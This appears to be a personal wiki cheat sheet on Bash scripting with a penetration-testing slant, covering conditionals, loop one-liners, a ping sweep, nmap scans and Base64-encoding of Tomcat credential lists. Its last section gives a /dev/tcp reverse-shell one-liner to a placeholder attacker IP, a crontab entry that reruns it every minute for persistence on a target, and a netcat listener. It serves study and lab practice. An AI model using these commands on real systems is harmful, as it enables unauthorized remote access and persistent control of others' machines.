====== Bash ======
All your happy shiny bash scripts must start with a shebang:
#!/bin/bash
----
===== Conditional Statements =====
How-To: https://tldp.org/HOWTO/Bash-Prog-Intro-HOWTO-6.html
**Basic Structure:**
#!/bin/bash
if [ "foo" = "foo" ]; then
echo expression evaluated as true
else
echo expression evaluated as false
fi
**Example:**
#!/bin/bash
echo "Enter username: "
read un
echo "Enter password: "
read pw
if [[ "$un" = "admin" && "$pw" = "superuser" ]]; then
echo "Login Successful"
fi
**NOTE: The == operator is non-standard **
* Bash allows ''=='' to be used for equality with ''['', but this is not standard.
* See: [[ https://stackoverflow.com/questions/2237080/how-to-compare-strings-in-bash/2237103 | Compare Strings in Bash]]
* Use either the first case wherein the quotes around $x are optional:
if [[ "$x" == "valid" ]]; then
* or use the second case:
if [ "$x" = "valid" ]; then
----
===== For Loop One-Liners =====
**Run a command 5 times:**
for i in {1..5}; do COMMAND-HERE; done #does command 5 times
for (( c=1; c<=5; c++ )); do COMMAND-HERE; done #same as above
for i in {0..10..2}; do COMMAND-HERE; done #same but steps by 2
Or...
for((i=1;i<=10;i+=2)); do echo "Welcome $i times"; done
**Work On Files:**
# General
for i in *; do echo $i; done
# To encode multiple username:password combos in a text file to Base64
for cred in $(cat tomcat.txt); do echo -n $cred | base64; done
# Same as above, but appended to a text file
for cred in $(cat tomcat.txt); do echo -n $cred | base64 >> tomcat_base64.txt; done
# NOTE: The -n on the echo is necessary to NOT output the trailing newline character to the encoder
Or...
for i in /etc/*.conf; do cp $i /backup; done
**My example iplist.txt:**
for ip in $(cat iplist.txt); do nmap -sS -p 80 -T4 $ip; done
Or...
for ip in $(cat iplist.txt); do nmap -sS -p 80 -T4 $ip & done
----
===== Ping Sweep =====
Simple sweep of a network for a quick look at what machines are out there (and respond):
for i in {1..254}
do
ping -w 5 -c 1 192.168.0.$i | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" &
done
wait # no args, wait until all background processes to finish
Note the "&" at the end. This will speed things up a lot.
----
===== Reverse Shell One-Liner =====
/bin/bash -c 'bash -i &> /dev/tcp/[attack ip]/[port] 0>&1'
From the [[https://linux.die.net/man/1/bash | Bash manpage]]:
* **-c //string//**: commands are read from string.
* **>&** (same as **&>**) : redirect standard output (1) and standard error (2); i.e., **2>&1**
* This means: **&>** redirects the standard output (fd 1) and error (fd 2) to the socket opened to the IP specified which would be listening on the port specified.
* **0>&1** : redirect standard input (fd 0) to the same place as standard output (fd 1).
* This would literally mean '0' (standard input) is attached to '1' (standard output).
* Therefore, stdin (fd 0) is attached to stdout (fd 1) and (from the above: **&>** ) we know that the stdin for this bash process is available to the attacker listening on the port specified.
**__For persistence on a target__:** Include this one-liner in a crontab entry (i.e., a cronjob) that executes every minute of every day, etc.
echo "* * * * * /bin/bash -c 'bash -i &> /dev/tcp/[attack ip]/[port] 0>&1'" > gk_cron_job
crontab -i gk_cron_job
crontab -l # list user's crontab and verify
Set up a listener on the attack machine (''nc -nvlp [port#]'') and it should connect within 1 minute.
----